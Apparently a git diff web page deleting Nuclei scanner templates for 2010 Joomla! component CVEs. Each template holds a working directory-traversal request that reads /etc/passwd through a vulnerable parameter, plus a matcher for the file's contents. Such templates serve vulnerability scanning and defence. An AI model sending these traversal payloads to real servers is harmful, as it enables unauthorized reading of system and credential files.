||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0985
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2010-1219
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1302
|
||||
|
||||
info:
|
||||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi,graph
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1304
|
||||
|
||||
info:
|
||||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi,status
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1305
|
||||
|
||||
info:
|
||||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1306
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1307
|
||||
|
||||
info:
|
||||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1308
|
||||
|
||||
info:
|
||||
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12066
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1308
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1312
|
||||
|
||||
info:
|
||||
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12077
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1312
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1313
|
||||
|
||||
info:
|
||||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1314
|
||||
|
||||
info:
|
||||
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12086
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue